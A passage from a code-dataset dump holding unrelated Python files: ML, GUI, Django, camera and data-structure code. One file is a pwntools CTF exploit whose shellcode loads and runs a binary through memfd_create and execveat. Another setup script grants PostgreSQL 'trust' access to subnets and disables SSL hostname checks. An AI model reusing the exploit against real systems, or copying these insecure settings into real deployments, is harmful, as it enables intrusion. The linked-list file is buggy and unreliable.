self.out_channels,\n self.n_kernels\n )\n\n\n def init_weight(self):\n std = 1. / math.sqrt(self.in_channels)\n self.kernel.data.uniform_(-std, std)\n\n def forward(self, inputs):\n features = inputs.F\n coords = inputs.C\n cur_stride = inputs.s\n\n kernels = torch.index_select(self.kernel, 0, coords[:, self.z_dim].long() / cur_stride)\n sparse_features = (features.unsqueeze(-1) * kernels).sum(1) + self.bias\n sparse_coords = (coords - self.offset).t()[[3] + self.bev_dims].long()\n sparse_coords[1:] /= cur_stride\n batch_size = sparse_coords[0].max().item() + 1\n sparse_coords = sparse_coords[0] * int(self.bev_shape.prod()) + sparse_coords[1] * int(self.bev_shape[1]) + sparse_coords[2]\n bev = torch.cuda.sparse.FloatTensor(\n sparse_coords.unsqueeze(0),\n sparse_features,\n torch.Size([batch_size * int(self.bev_shape.prod()), sparse_features.size(-1)]),\n ).to_dense()\n return bev.view(batch_size, *self.bev_shape, -1).permute(0, 3, 1, 2).contiguous() # To BCHW\n","sub_path":"torchsparse/nn/modules/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":7321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"487895181","text":"class Employee:\n\temployee_count=0;\n\tdef __init__(self,name,salary):\n\t\tself.name=name;\n\t\tself.salary=salary;\n\t\tEmployee.employee_count+=1;\n\t\t\n\tdef displaycount(self):\n\t\tprint(\"Total Employee count: \"+str(Employee.employee_count));\n\t\t\n\tdef displayEmpData(self):\n\t\tprint(\"Employee name: \"+self.name+\" Employee Salary: \"+str(self.salary));\n\t\t\nemp1 = Employee(\"shailesh\",1000.0);\nemp2 = Employee(\"vishal\",2000.0);\n\nemp2.displaycount();\nemp1.displayEmpData();\nemp2.displayEmpData();\n\nif hasattr(emp1,\"salary\"):\n print(\"Employee has Salary attribute\");\n setattr(emp1,\"salary\",2500.0);\n emp1.displayEmpData();\nelse:\n print(\"Employee does not have Salary attribute\");","sub_path":"classes_objects/classex.py","file_name":"classex.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"605957146","text":"import Tkinter as tk\nimport tkFileDialog\nimport os\nimport cv2\nimport shutil\nimport numpy as np\nfrom PIL import Image, ImageTk\nfrom facemodel import *\n\nHUGE_FONT = (\"Verdana\", 16)\nLARGE_FONT = (\"Verdana\", 12)\nNORMAL_FONT = (\"Verdana\", 10)\nSMALL_FONT = (\"Verdana\", 8)\n\n\n\n# http://zetcode.com/gui/tkinter/dialogs/\n\n# controller\nclass FaceApp(tk.Tk):\n def __init__(self, *args, **kwargs):\n self.root = tk.Tk.__init__(self, *args, **kwargs)\n self.img_w = 480\n self.img_h = 360\n self.geometry(str(self.img_w + 240) + \"x\" + str(self.img_h*2 + 120) + \"+300+300\")\n tk.Tk.wm_title(self, \"FaceApp\")\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n self.frames = {}\n\n # add new pages to that list:\n #for F in (StartPage):\n frame = StartPage(container, self)\n self.frames[StartPage] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n self.show_frame(StartPage)\n\n def show_frame(self, cont):\n frame = self.frames[cont]\n frame.tkraise()\n\n def do_nothing(self):\n filewin = tk.Toplevel(self)\n button = tk.Button(filewin, text=\"Do nothing button\")\n button.pack()\n print(\"do nothing\")\n\n\n\nclass StartPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n self.label_txt = tk.Label(self, text=\"Choose an action\", font=LARGE_FONT)\n self.label_txt.pack(pady=10, padx=10)\n\n #button1 = tk.Button(self, text=\"Visit Page 1\", command=lambda: controller.show_frame(PageOne))\n #button1.pack()\n\n self.button_train = tk.Button(self, text=\"Train\", fg=\"red\", command=self.train)\n self.button_train.pack(side=tk.LEFT, padx=5)\n\n self.button_authorize = tk.Button(self, text=\"Authorize\", fg=\"blue\", command=self.authorize, state=tk.DISABLED)\n self.button_authorize.pack(side=tk.LEFT, padx=5)\n\n #self.button_load_model = tk.Button(self, text=\"Load Model\", fg=\"green\", command=self.load_model)\n #self.button_load_model.pack(side=tk.LEFT)\n\n #self.button_save_model = tk.Button(self, text=\"Save Model\", fg=\"yellow\", command=self.save_model, state=tk.DISABLED)\n #self.button_save_model.pack(side=tk.LEFT, padx=5)\n\n self.button_close = tk.Button(self, text=\"Close\", fg=\"black\", command=self.quit)\n self.button_close.pack(side=tk.LEFT, padx=5)\n\n\n self.img_cam = np.zeros((controller.img_h, controller.img_w, 3), dtype=np.uint8)\n self.img_res = None\n self.img_cur = None\n self.cap = cv2.VideoCapture(0)\n\n # self.label_cam_txt = tk.Label(self, text=\"live camera stream\", font=SMALL_FONT)\n # self.label_cam_txt.pack(side=tk.TOP, pady=0, padx=10)\n master=controller\n self.label_cam_stream = tk.Label()\n self.label_cam_stream.pack(side=tk.TOP, pady=5)\n\n self.label_img_res_txt = tk.Label(self, text=\"processed image:\", font=LARGE_FONT)\n self.label_img_res_txt.pack(side=tk.TOP,pady=12, padx=10)\n\n self.label_img_res = tk.Label(master=controller)\n self.label_img_res.pack(side=tk.TOP, pady=5)\n\n self.model = FaceModel()\n\n self.show_video()\n\n\n def train(self):\n print(\"Train chosen!\")\n #self.button_save_model['state'] = tk.NORMAL\n\n self.model.train_model()\n self.button_authorize['state'] = tk.NORMAL\n\n\n def authorize(self):\n print(\"Authorization chosen!\")\n self.model.authorize()\n\n\n def load_model(self):\n # https://stackoverflow.com/questions/16429716/opening-file-tkinter\n print(\"Load model chosen!\")\n ftypes = [('model files', '*.model')]\n dlg = tkFileDialog.Open(self.controller, filetypes = ftypes)\n filename = dlg.show()\n\n if filename != '' and filename is not None:\n if self.model.load_model(filename):\n # self.button_load_model['state'] = tk.DISABLED\n self.button_save_model['state'] = tk.NORMAL\n self.button_authorize['state'] = tk.NORMAL\n\n def save_model(self):\n print(\"save model chosen!\")\n ftypes = [('model files', '*.model')]\n cwd = os.getcwd()\n filename = tkFileDialog.asksaveasfilename(initialdir=cwd, title=\"Select file\", filetypes=ftypes)\n if filename != '' and filename is not None:\n if self.model.save_model(filename) :\n self.button_load_model['state'] = tk.NORMAL\n self.button_authorize['state'] = tk.NORMAL\n\n def show_video(self):\n if not self.cap.isOpened():\n print(\"ERROR: cannot open the camera\")\n\n flag, img_new = self.cap.read()\n #print(\"capture...\")\n if flag is None:\n print(\"ERROR: cannot read the camera!\")\n elif flag:\n self.img_cam = img_new.copy()\n self.img_cam = cv2.cvtColor(self.img_cam, cv2.COLOR_BGR2RGB)\n self.img_cam = cv2.resize(self.img_cam, (self.controller.img_w, self.controller.img_h))\n\n img1 = Image.fromarray(self.img_cam)\n imgtk_cam = ImageTk.PhotoImage(image=img1)\n self.label_cam_stream.imgtk = imgtk_cam\n self.label_cam_stream.configure(image=imgtk_cam)\n\n self.model.set_cam_image(self.img_cam)\n self.img_res = self.model.get_res_image()\n\n self.label_img_res_txt['text'] = self.model.get_info()\n\n if self.img_res is None:\n self.img_res = self.img_cam\n\n img2 = Image.fromarray(self.img_res)\n imgtk_res = ImageTk.PhotoImage(image=img2)\n self.label_img_res.imgtk = imgtk_res\n self.label_img_res.configure(image=imgtk_res)\n\n self.label_cam_stream.after(50, self.show_video)\n\n def quit(self):\n if self.model.is_training:\n self.model.stop_thread()\n self.controller.quit()\n\ndef main():\n app = FaceApp()\n app.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"FaceApp.py","file_name":"FaceApp.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"552900804","text":"from pwn import *\n\ncontext.aslr=0\nr = process([\"./shellcoder\"])\n#r = remote(\"139.180.215.222\", 20002)\n\n\ncontext.arch = \"amd64\"\ncontext.log_level='debug'\n\ngdb.attach(r,'b* 0x15555554a0af')\nr.sendafter(\":\",asm(\"\"\"\npush rdi\npop rsi\nxchg edi,edx\nsyscall\nnop\n\"\"\"))\n\n# syscall(SYS_execveat, exec_fd, \"\", argv, NULL, AT_EMPTY_PATH);\n# int fd=SYS_memfd_create(char *uname, unsigned int flags)\n# int n=SYS_read(0,buf,n)\n# int n=SYS_write(fd,buf,n)\n# tub_execveat(int fd, char *filename(point to zero),0,0,0x1000)\n\nr.send(\"\\x90\"*0x30+asm(shellcraft.pushstr(\"byzero\"))+asm(\"\"\"\nmov rax,319\nmov rdi,rsp\nmov rsi,0\nsyscall\nmov rbx,rax\nloop:\nmov rdi,0\nmov rsi,rsp\nmov rdx,0x400\nmov rax,0\nsyscall\ncmp rax,0\nje go\nmov rdi,rbx\nmov rsi,rsp\nmov rdx,rax\nmov rax,1\nsyscall\njmp loop\ngo:\nmov rdi,rbx\npush 0\nmov rsi,rsp\nxor rdx,rdx\nxor r10,r10\nmov r8,0x1000\nmov rax,322\nsyscall\n\"\"\"))\n\n\nr.recvrepeat(1)\nr.send(open(\"find_flag\").read()) # another binary we want to execute\nr.shutdown(\"send\") # close the tube\n\nr.interactive()\n","sub_path":"2019/2019-rctf/shellcoder/balsn_exp.py","file_name":"balsn_exp.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"45980962","text":"#!/usr/bin/python\n#\n'''\n[ auth_go_setup.py ]\n\nCOPYRIGHT (c) 2017 by MediaMath, Cambridge, MA USA.\nAll rights reserved. This material contains unpublished, copyrighted\nwork including confidential and proprietary information of MediaMath.\n\nset of steps necessary to perform after any environment's adama database\nrefresh is performed in order to properly configure auth.go (for taxonomy\ntests)\n'''\n\nimport logging\nimport optparse\nimport ssh_util\n\nparser = optparse.OptionParser(description=\"Auth.go setup\")\nparser.add_option(\"--ssh_ip\", type=str, help=\"ssh ip address\")\nparser.add_option(\"--ssh_port\", type=str, help=\"ssh port\")\nparser.add_option(\"--private_key\", type=str,\n default=\"/home/jenkins/.ssh/dmp-ec2-qa.pem\",\n help=\"private key for ssh security\")\nparser.add_option(\"--log_level\", type=str, default=\"DEBUG\",\n help=\"logging level\")\nparser.add_option(\"--postgres_file\", type=str,\n default=\"/etc/postgresql/9.4/main/pg_hba.conf\")\nparser.add_option(\"--adama_start_file\", type=str,\n default=\"/apps/t1_v2/prod/adama_start.pl\")\nparser.add_option(\"--adama_conf_file\", type=str,\n default=\"/apps/t1_v2/prod/adama_local.conf\")\nargs, _ = parser.parse_args()\n\n# configuration\nSSH_IP = args.ssh_ip\nSSH_PORT = args.ssh_port\nPRIVATE_KEY = args.private_key\nLOG_LEVEL = args.log_level\nPOSTGRES_FILE = args.postgres_file\nADAMA_START_FILE = args.adama_start_file\nADAMA_CONF_FILE = args.adama_conf_file\n\n\ndef ssh():\n ssh_ins = ssh_util.SSHUtil(SSH_IP, SSH_PORT)\n init()\n return ssh_ins\n\n\ndef init():\n \"\"\" init once for all the test in this class \"\"\"\n\n private_key = PRIVATE_KEY\n log_level = LOG_LEVEL\n\n level = logging.INFO if log_level == 'INFO' else logging.DEBUG\n logging.basicConfig(level=level)\n logging.info('set logging level to: : %s', log_level)\n\n ssh_util.SSHUtil.ssh_add_private_key(private_key)\n\n\nssh_object = ssh()\n\nlogging.info('Add necessary IP addresses to postgres config')\nlocal_connections = [\n \"host adama_camb-dev adama 10.150.68.0/22 trust\",\n \"host adama_camb-dev adama 10.150.69.0/22 trust\",\n \"host adama_camb-dev adama 10.150.70.0/22 trust\",\n \"host adama_camb-dev adama 10.150.71.0/22 trust\"]\n\nfor conn in local_connections:\n ssh_object.append_string_to_file(\"# IPv4 local connections:\",\n conn,\n POSTGRES_FILE)\n\nlogging.info('Restarting postgresql service')\ncommand = \"sudo service postgresql restart\"\nssh_object.ssh_execute_cmd(command, return_subprocess=True)\n\nlogging.info('Add environment variable to Adama startup routine')\nssh_object.append_string_to_file(\"$ENV{USE_DBIX_CONNECTOR} = 0;\",\n \"\\$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;\",\n ADAMA_START_FILE)\n\nlogging.info('Rename entitlements to auth.go')\nssh_object.replace_string_in_file(\"/entitlements/\",\n \"/authgo/\",\n ADAMA_CONF_FILE)\n\nlogging.info('Add timeout to auth.go configuration')\nssh_object.append_string_to_file(\"url https://localhost/authgo/\",\n \"\\ timeout 15\",\n ADAMA_CONF_FILE)\n\nssh_object.restart_service_by_name(\"adama_v2\")\n","sub_path":"plexus/tests/ads-mmtest/lib/utils/auth_go_setup.py","file_name":"auth_go_setup.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"217774136","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @package camLivePy\n#\n# This code is used to view a live stream of images on the computer\n#\n\n\n# Socket server\nimport sys\nimport numpy as np\nfrom optparse import OptionParser # Parser for command line options\nimport subprocess\nimport signal\nimport time\n\ntry:\n import cv\nexcept:\n import cv2 as cv\n\nfrom camSocketPy import *\n\n\n##\n# @brief Gets image from CamLight (throught socket)\n##\ndef getImage(addressSocket):\n client = ClientSocketUDP('livePreview', addressSocket, portSocketCamlive)\n ready = select.select([client.client_socket], [], [], None)\n sizeHeader = 0\n\n if ready[0]:\n recv_data = client.client_socket.recv(65536)\n numberOfPacketsToReceive, imageWidth, imageHeight = map(\n int, recv_data.split(' ')) # convert to int what we receive from socket\n\n while True:\n # init\n timeout_in_seconds = None\n client.send('get')\n recv_data = ''\n packetsReceived = 0\n imgBuffer = []\n\n # Receive packets\n while(packetsReceived != numberOfPacketsToReceive):\n ready = select.select([client.client_socket], [], [], timeout_in_seconds)\n if ready[0]:\n recv_data = client.client_socket.recv(65536)\n packetsReceived += 1\n if (packetsReceived == 1):\n # convert to int what we receive from socket\n timestampStart, timestampEnd = map(int, recv_data.split(' '))\n else:\n if (packetsReceived == 2):\n sizeHeader = len(recv_data)\n imgBuffer.extend(recv_data)\n client.send(str(packetsReceived))\n\n # Read buffer/image for display\n nparr = np.asarray(bytearray(imgBuffer[sizeHeader:]), dtype=np.uint8)\n imgB = np.reshape(nparr, (imageHeight, imageWidth))\n\n try:\n cv.ShowImage('', cv.fromarray(imgB))\n except:\n cv.imshow('', imgB)\n\n try:\n cv.WaitKey(1)\n except:\n # cv.waitKey(10)\n pass\n\n\ndef killOnCam(addressSocket):\n # Command to run via ssh\n HOST = \"root@\" + addressSocket\n # Ports are handled in ~/.ssh/config since we use OpenSSH\n COMMAND = \"killall camlive\"\n\n # ssh = subprocess.Popen([\"ssh\", \"%s\" % HOST, COMMAND],\n # shell=False,\n # stdout=subprocess.PIPE,\n # stderr=subprocess.PIPE)\n subprocess.Popen([\"ssh\", \"%s\" % HOST, COMMAND],\n shell=False,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n\ndef runOnCam(addressSocket):\n # Command to run via ssh\n HOST = \"root@\" + addressSocket\n # Ports are handled in ~/.ssh/config since we use OpenSSH\n COMMAND = \"/sdcard/bin/camlive\"\n\n # ssh = subprocess.Popen([\"ssh\", \"%s\" % HOST, COMMAND],\n # shell=False,\n # stdout=subprocess.PIPE,\n # stderr=subprocess.PIPE)\n subprocess.Popen([\"ssh\", \"%s\" % HOST, COMMAND],\n shell=False,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n time.sleep(1) # wait one second so the camlive can launch a server\n\n\ndef signal_handler(signal, frame):\n killOnCam(addressSocket)\n sys.exit(0)\n\n\n##\n# @brief Main function\n##\nif __name__ == '__main__':\n # Parsing arguments\n parser = OptionParser()\n parser.add_option(\"-a\", \"--address\", help=\"address of camlight to display. Default = 6 (172.16.100.46)\")\n parser.add_option(\"-f\", \"--fulladdress\", help=\"full address of camlight to display. Default = 172.16.100.46\")\n parser.add_option(\"-r\", \"--run\", help=\"Automatically run the camlive. By default 1. Set to 0 to deactivate.\")\n (options, args) = parser.parse_args()\n\n baseAddressSocket = '172.16.100.4'\n addressSocket = baseAddressSocket + '6' # by default camera '172.16.100.46'\n\n if options.address is not None:\n addressSocket = baseAddressSocket + options.address\n if options.fulladdress is not None:\n addressSocket = options.fulladdress\n\n # Ctrl+c handler\n signal.signal(signal.SIGINT, signal_handler)\n\n # Command to run via ssh\n if options.run is None or options.run == '1':\n runOnCam(addressSocket)\n\n getImage(addressSocket)\n","sub_path":"camlive/client/camLivePy.py","file_name":"camLivePy.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"407957182","text":"import unittest\nfrom datetime import datetime\n\nfrom django.template.defaultfilters import slugify\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\nfrom django.utils import timezone\n\nfrom freezegun import freeze_time\n\nfrom .models import Event\nfrom .models import Performance\nfrom .models import ReoccurringEventType\nfrom core.utils import CalendarWeek\nfrom core.utils import EST\n\n\nclass EventDateTimeMethodsTC(TestCase):\n def setUp(self):\n self.e = Event.objects.create(name='TestEvent')\n\n self.p1 = Performance.objects.create(\n event=self.e,\n name='First Performace in Event',\n start_dt=datetime(2013, 1, 17, 19, 30, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 17, 20, 0, 0, tzinfo=EST)\n )\n\n self.p2 = Performance.objects.create(\n event=self.e,\n name='Second Performace in Event',\n start_dt=datetime(2013, 1, 17, 19, 45, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 17, 20, 15, 0, tzinfo=EST)\n )\n\n self.p3 = Performance.objects.create(\n event=None,\n name='Performace not in Event',\n start_dt=datetime(2013, 1, 17, 19, 30, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 17, 20, 0, 0, tzinfo=EST)\n )\n\n def test_event_start_dt_is_first_peformance_start_dt(self):\n self.assertEqual(Performance.objects.count(), 3)\n self.assertEqual(self.e.start_dt, self.p1.start_dt)\n\n def test_event_end_dt_is_last_peformance_end_dt(self):\n self.assertEqual(self.e.end_dt, self.p2.end_dt)\n\n def test_event_start_dt_overrides_performance_dt(self):\n dt = datetime(2013, 1, 17, 21, 45, 0, tzinfo=EST)\n self.e._start_dt = dt\n self.assertEqual(self.e.start_dt, dt)\n\n def test_event_end_dt_overrides_performance_dt(self):\n dt = datetime(2013, 1, 17, 22, 40, 0, tzinfo=EST)\n self.e._end_dt = dt\n self.assertEqual(self.e.end_dt, dt)\n\n\nclass EventPerformanceRelationTC(TestCase):\n def setUp(self):\n self.e = Event.objects.create(name='TestEvent')\n\n self.p1 = Performance.objects.create(\n event=self.e,\n name='First Performace in Event',\n start_dt=datetime(2013, 1, 17, 19, 30, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 17, 20, 0, 0, tzinfo=EST)\n )\n\n self.p2 = Performance.objects.create(\n event=self.e,\n name='Second Performace in Event',\n start_dt=datetime(2013, 1, 17, 19, 45, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 17, 20, 15, 0, tzinfo=EST)\n )\n\n self.p3 = Performance.objects.create(\n event=None,\n name='Performace not in Event',\n start_dt=datetime(2013, 1, 17, 19, 30, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 17, 20, 0, 0, tzinfo=EST)\n )\n\n def test_event_contains_correct_performances(self):\n self.assertIn(self.p1, self.e.performance_set.all())\n self.assertIn(self.p2, self.e.performance_set.all())\n self.assertNotIn(self.p3, self.e.performance_set.all())\n\n def test_iterability_of_event(self):\n expected = [self.p1, self.p2]\n result = [p for p in self.e]\n self.assertEqual(expected, result)\n\n\nclass EventsPerformacesWeekPassedToTemplateTC(TestCase):\n \"\"\"\n Assert that correct event and performances objects are handed to\n template for rendering.\n \"\"\"\n def setUp(self):\n \"\"\"\n Set up events and performances for next several weeks\n \"\"\"\n self.cal_week = CalendarWeek()\n\n # Week of Monday, 2012-12-10 - One Event, Winter Ball\n self.e1 = Event.objects.create(\n name='QSIC Winter Ball',\n description='A night of fun!',\n _start_dt=datetime(2012, 12, 15, 21, 0, 0, tzinfo=EST),\n _end_dt=datetime(2012, 12, 16, 2, 0, 0, tzinfo=EST),\n _price=15.00\n )\n\n # Week of Monday, 2012-12-17 - One event with two performances\n self.e2 = Event.objects.create(name='QSIC House Night', description='A night of fun!')\n self.p1 = Performance.objects.create(\n event=self.e2,\n name='Peace Love and Joy',\n start_dt=datetime(2012, 12, 21, 19, 30, 0, tzinfo=EST),\n end_dt=datetime(2012, 12, 21, 20, 0, 0, tzinfo=EST),\n price=5.00\n )\n self.p2 = Performance.objects.create(\n event=self.e2,\n name=\"Rockin' Rolla Music\",\n start_dt=datetime(2012, 12, 21, 20, 0, 0, tzinfo=EST),\n end_dt=datetime(2012, 12, 21, 20, 30, 0, tzinfo=EST),\n price=5.00\n )\n\n # Week of Monday, 2012-12-24 - Dark\n\n # Week of Monday, 2012-12-31 - No events, 3 performances\n self.p3 = Performance.objects.create(\n event=self.e2,\n name='Suzie Q & The Team',\n start_dt=datetime(2013, 1, 2, 20, 15, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 2, 23, 0, 0, tzinfo=EST),\n price=5.00\n )\n self.p4 = Performance.objects.create(\n event=self.e2,\n name='Magic Man, The',\n start_dt=datetime(2013, 1, 4, 19, 0, 0, tzinfo=EST),\n end_dt=datetime(2012, 1, 4, 21, 15, 0, tzinfo=EST),\n price=5.00\n )\n self.p5 = Performance.objects.create(\n event=self.e2,\n name='Marty Loves Pizza',\n start_dt=datetime(2013, 1, 5, 12, 30, 0, tzinfo=EST),\n end_dt=datetime(2012, 1, 5, 16, 0, 0, tzinfo=EST),\n price=5.00\n )\n\n # Week of Monday, 2013-01-07 - 1 events, 2 performances in event, 1 not in event\n self.e3 = Event.objects.create(name='Happy Fun Time', description='Lalalalalal')\n self.p6 = Performance.objects.create(\n event=self.e3,\n name='Skiddss',\n start_dt=datetime(2013, 1, 11, 15, 0, 0, tzinfo=EST),\n end_dt=datetime(2012, 1, 11, 17, 0, 0, tzinfo=EST),\n price=23.00\n )\n self.p7 = Performance.objects.create(\n event=self.e3,\n name='Lolipops',\n start_dt=datetime(2013, 1, 11, 17, 30, 0, tzinfo=EST),\n end_dt=datetime(2012, 1, 11, 19, 0, 0, tzinfo=EST),\n price=34.00\n )\n self.p8 = Performance.objects.create(\n name='Madness!',\n start_dt=datetime(2013, 1, 11, 20, 30, 0, tzinfo=EST),\n end_dt=datetime(2012, 1, 11, 22, 0, 0, tzinfo=EST),\n price=15.00\n )\n\n def get_local_context(self, response):\n self.assertTrue(hasattr(response, 'context'))\n context = response.context\n return {'events': context['events'], 'performances': context['performances']}\n\n def test_no_performaces_or_events_for_dark_week(self):\n response = self.client.get('/events/week/20121224', follow=True)\n local_context = self.get_local_context(response)\n # Assert no events\n self.assertEqual(local_context['events'], [])\n # Assert no Performances\n self.assertEqual([p for p in local_context['performances']], [])\n\n def test_performances_no_events(self):\n response = self.client.get('/events/week/20121231', follow=True)\n local_context = self.get_local_context(response)\n # Assert no events\n self.assertEqual(local_context['events'], [])\n # 3 Performances\n self.assertEqual(local_context['performances'].count(), 3)\n\n def test_no_non_event_performances_one_event(self):\n response = self.client.get('/events/week/20121217', follow=True)\n local_context = self.get_local_context(response)\n # Assert 1 event\n self.assertEqual(len([e for e in local_context['events']]), 1)\n # No Performances\n self.assertEqual(local_context['performances'].count(), 0)\n\n def test_events_and_non_event_performances(self):\n response = self.client.get('/events/week/20130107', follow=True)\n local_context = self.get_local_context(response)\n # Assert 1 event\n events = [e for e in local_context['events']]\n self.assertEqual(len(events), 1)\n event_performances = [p for p in events[0]]\n # 2 Event Performances\n self.assertEqual(len(event_performances), 2)\n # 1 Non Event Performance\n self.assertEqual(local_context['performances'].count(), 1)\n\n\n# \"2012-12-12 00:00:00\" is a Wednesday\n# 15th is a Saturday\n@freeze_time(\"2012-12-12 00:00:00\", tz_offset=-4)\nclass EventsPerformacesDetailViewContextPassedToTemplateTC(TestCase):\n \"\"\"\n Assert that correct event and performance objects are handed to\n template for rendering.\n \"\"\"\n def setUp(self):\n \"\"\"\n Set up an event and some performances.\n \"\"\"\n self.cal_week = CalendarWeek()\n\n # Week of Monday, 2012-12-17 - One event with two performances\n self.e1 = Event.objects.create(name='QSIC House Night', description='A night of fun!')\n self.p1 = Performance.objects.create(\n event=self.e1,\n name='Peace Love and Joy',\n start_dt=datetime(2012, 12, 21, 19, 30, 0, tzinfo=EST),\n end_dt=datetime(2012, 12, 21, 20, 0, 0, tzinfo=EST),\n price=5.00\n )\n self.p2 = Performance.objects.create(\n event=self.e1,\n name=\"Rockin' Rolla Music\",\n start_dt=datetime(2012, 12, 21, 20, 0, 0, tzinfo=EST),\n end_dt=datetime(2012, 12, 21, 20, 30, 0, tzinfo=EST),\n price=5.00\n )\n\n def test_event_in_context(self):\n response = self.client.get('/events/event/' + str(self.e1.id), follow=True)\n self.assertTrue(hasattr(response, 'context_data'))\n local_context = response.context_data\n self.assertEqual(local_context['event'], self.e1)\n\n def test_performance_in_context_no_event(self):\n response = self.client.get('/events/performance/' + str(self.p1.id), follow=True)\n self.assertTrue(hasattr(response, 'context_data'))\n local_context = response.context_data\n self.assertEqual(local_context['performance'], self.p1)\n self.assertFalse(hasattr(local_context, 'event'))\n\n\nclass SlugTC(TestCase):\n \"\"\"\n A test case for all slug related tests.\n \"\"\"\n @classmethod\n def setUpClass(cls):\n cls.start_dt = datetime.now().replace(tzinfo=EST)\n cls.end_dt = datetime.now().replace(tzinfo=EST)\n\n def test_save_event_generates_correct_slug(self):\n e = Event.objects.create(name='QSIC House Night')\n self.assertEqual(e.slug, 'qsic-house-night')\n\n def test_save_performance_generates_correct_slug(self):\n p = Performance.objects.create(name='Butter High!',\n start_dt=self.start_dt,\n end_dt=self.end_dt)\n self.assertEqual(p.slug, 'butter-high')\n\n def test_get_event_detail_view_redirects_to_view_with_slug(self):\n e = Event.objects.create(name='QSIC House Night')\n response = self.client.get('/events/event/' + str(e.id), follow=True)\n self.assertTrue(hasattr(response, 'request'))\n self.assertEqual(response.request['PATH_INFO'], e.url)\n\n def test_get_performance_detail_view_redirects_to_view_with_slug(self):\n p = Performance.objects.create(name='Butter High!',\n start_dt=self.start_dt,\n end_dt=self.end_dt)\n response = self.client.get('/events/performance/' + str(p.id), follow=True)\n self.assertTrue(hasattr(response, 'request'))\n self.assertEqual(response.request['PATH_INFO'], p.url)\n\n\nclass ReoccuringEventsTC(TestCase):\n def test_build_reoccuring_events(self):\n event_start_time = datetime(2014, 6, 20, 19, 30, 0, tzinfo=EST)\n event_end_time = datetime(2014, 6, 20, 22, 30, 0, tzinfo=EST)\n ret = ReoccurringEventType.objects.create(name='Test events', period=7)\n e = Event.objects.create(name='TestEvent',\n description='Lots of fun here',\n reoccurring_event_type=ret,\n _start_dt=event_start_time,\n _end_dt=event_end_time)\n self.assertEqual(Event.objects.count(), 1)\n # go to up-next page 8 days prior to event's start date\n with freeze_time('2014-06-12 00:00:00', tz_offset=-4):\n self.client.get(reverse('events:up_next'), follow=True)\n self.assertEqual(Event.objects.count(), 1)\n # go to page 4 days prior to event's start date\n with freeze_time('2014-06-16 00:00:00', tz_offset=-4):\n self.client.get(reverse('events:up_next'), follow=True)\n e_qs = Event.objects.order_by('-_start_dt')\n self.assertEqual(e_qs.count(), 2)\n self.assertEqual(e_qs.first().start_dt, e.start_dt + timezone.timedelta(days=7))\n # go to page 2 days after event's start date\n with freeze_time('2014-06-22 00:00:00', tz_offset=-4):\n self.client.get(reverse('events:up_next'), follow=True)\n self.assertEqual(Event.objects.count(), 3)\n e_qs = Event.objects.order_by('-_start_dt')\n self.assertEqual(e_qs.first().start_dt, e.start_dt + timezone.timedelta(days=14))","sub_path":"events/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":13347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"327571201","text":"\"\"\"\n This is a most basic singly linked list with key and value\n\"\"\"\n\n\nclass LinkNode:\n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.next = None\n\n\nclass LinkList:\n def __init__(self, key, val):\n self.list = LinkNode(key, val)\n\n def add_node(self, key, val):\n self.list.next = LinkNode(key, val)\n\n def add_node_front(self, key, val):\n new_head = LinkNode(key, val)\n cur_head = self.list\n new_head.next = cur_head\n self.list = new_head\n\n def remove_node(self, key):\n if self.list.key == key:\n self.list = self.list.next\n else:\n while self.list.next is not None:\n if key == self.list.next.key:\n self.list.next = self.list.next.next\n break\n\n def traverse(self):\n while self.list is not None:\n print('|key:{} value:{}|'.format(self.list.key, self.list.val))\n self.list = self.list.next\n\n\nif __name__ == '__main__':\n linked_list = LinkList(key=1, val=1)\n linked_list.add_node(key=2, val=2)\n linked_list.add_node_front(key=3, val=3)\n linked_list.traverse()\n","sub_path":"data-structures/singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"40995962","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom visualizer.models import User, Spreadsheet\nfrom visualizer.forms import EmailUserCreationForm, SpreadsheetForm\n\n\ndef index(request):\n return render(request, \"index.html\")\n\n\ndef about(request):\n return render(request, \"about.html\")\n\n\ndef signup(request):\n if request.method == 'POST':\n form = EmailUserCreationForm(request.POST)\n if form.is_valid():\n username = request.POST['username']\n password = request.POST['password1']\n user = form.save()\n user = authenticate(username=username, password=password)\n if user is not None:\n if 